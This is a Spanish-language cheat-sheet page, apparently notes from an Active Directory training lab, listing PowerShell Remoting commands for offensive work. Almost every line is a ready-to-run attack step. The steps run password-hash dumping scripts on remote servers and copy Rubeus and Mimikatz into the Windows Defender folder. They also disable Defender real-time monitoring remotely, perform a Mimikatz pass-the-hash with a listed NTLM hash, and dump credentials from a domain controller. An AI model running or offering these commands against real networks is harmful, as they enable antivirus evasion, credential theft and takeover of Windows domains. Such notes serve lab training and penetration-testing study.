Powershell Remoting

# Use a continuación para ejecutar comandos o bloques de script:
Invoke-Command -Scriptblock {Get-Process} -ComputerName (Get-Content<list_of_servers>)

# Use a continuación para ejecutar scripts desde archivos
Invoke-Command -FilePath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content<list_of_servers>)


# Use a continuación para ejecutar comandos "con estado" usando Invoke-Command:
$Sess=New-PSSession -Computername Server1
Invoke-Command -Session $Sess -ScriptBlock {$Proc=Get-Process}
Invoke-Command -Session $Sess -ScriptBlock {$Proc.Name}

# Copiar archivo a sesion remota
Copy-Item -ToSession $Sess -Path C:\AD\Tools\Rubeus.exe -Destination C:\Users\appadmin\Downloads\
Copy-Item .\Invoke-Mimikatz.ps1 \\dcorp-adminsrv\C$\'Program Files'\'Windows Defender'\Invoke-Mimikatz.ps1

# Entrar a la session:

Enter-PSSession $Sess

# Desactivar AV remotamente
Invoke-command -ScriptBlock{Set-MpPreference -DisableRealtimeMonitoring $true} -Session $sess


# Ejemplos
Invoke-Command -ScriptBlock {whoami;hostname} -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local

Entablar una sesion remota:

Escribir un bloque:

Mimikatz:

# PASS THE HASH and open powershell:
Invoke-Mimikatz -Command '"sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /ntlm:b38ff50
264b74508085d82c69794a4d8 /run:powershell.exe"'

# Ejemplo de Dumps

Invoke-Command -FilePath C:\AD\Tools\Invoke-Mimikatz.ps1 -ComputerName DCORP-DC
Invoke-Command -ScriptBlock ${function:Invoke-Mimikatz} -ComputerName DCORP-DC

Dumpeando con mimikatz de forma remota:

PreviousAccesos NextCredential Dumping

Last updated 2 years ago

hashtagMimikatz:

Mimikatz: